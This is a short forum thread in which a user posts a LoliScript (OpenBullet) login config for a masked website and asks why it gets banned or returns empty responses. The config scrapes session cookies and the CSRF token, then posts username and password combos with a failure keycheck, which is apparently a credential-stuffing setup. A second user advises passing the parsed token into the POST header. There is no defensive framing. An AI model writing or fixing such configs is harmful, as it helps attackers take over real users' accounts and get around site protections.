Parsing header x-csrf-token
-
Good Evening all
I have this response from the website :
Request Headers :
..
x-csrf-token: vNZO5RL94un4H/5QlYZ99MXPbQ4hvbRAr8WgfnZ5BA1Rog3Fd7NvNYqVTsof+f8XM1+mjddH6xaYVOCnbO/m0A==
x-requested-with: XMLHttpRequestMy loliscript :
REQUEST GET "https://****/users/sign_in"HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: /"PARSE "<COOKIES>" LR "{(__cfduid, " ")," -> VAR "__cfduid"
PARSE "<COOKIES>" LR " (_sourceout_session, " ")}" -> VAR "_sourceout_session"
PARSE "<HEADERS(x-csrf-token)>" LR "" "" -> VAR "AUTH"
REQUEST POST "https:///users/sign_in"
CONTENT "utf8=%E2%9C%93&user%5Bemail%5D=<USER>&user%5Bpassword%5D=<PASS>&user%5Bremember_me%5D=0&commit=Log+in"
CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8"
HEADER "origin: https://"
HEADER "referer: https://****"
HEADER "sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-fetch-dest: empty"
HEADER "sec-fetch-mode: cors"
HEADER "sec-fetch-site: same-origin"
HEADER "user-agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.121 Safari/537.36"
HEADER "x-requested-with: XMLHttpRequest"
HEADER ": scheme: https"
HEADER "accept: application/json, text/javascript, /; q=0.01"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "content-length: 125"
HEADER "x-csrf-token: vNZO5RL94un4H/5QlYZ99MXPbQ4hvbRAr8WgfnZ5BA1Rog3Fd7NvNYqVTsof+f8XM1+mjddH6xaYVOCnbO/m0A=="KEYCHECK
KEYCHAIN Failure OR
KEY ""Login faile"..
What im doing wrong ? it shows ban and results as an empty Response Source, have i been wrong in parsing x-csrf-token? if so then whats the correct way, i truly appreciate the help
-
Shouldn't your POST headers be something like this
HEADER "x-csrf-token: <AUTH>"
so the parsed csrf token can be passed to the next request?
-
@Fairy I changed it, same results
-
@Fairy Thank you i truly appreciate the help
-
You are the most welcome buddy.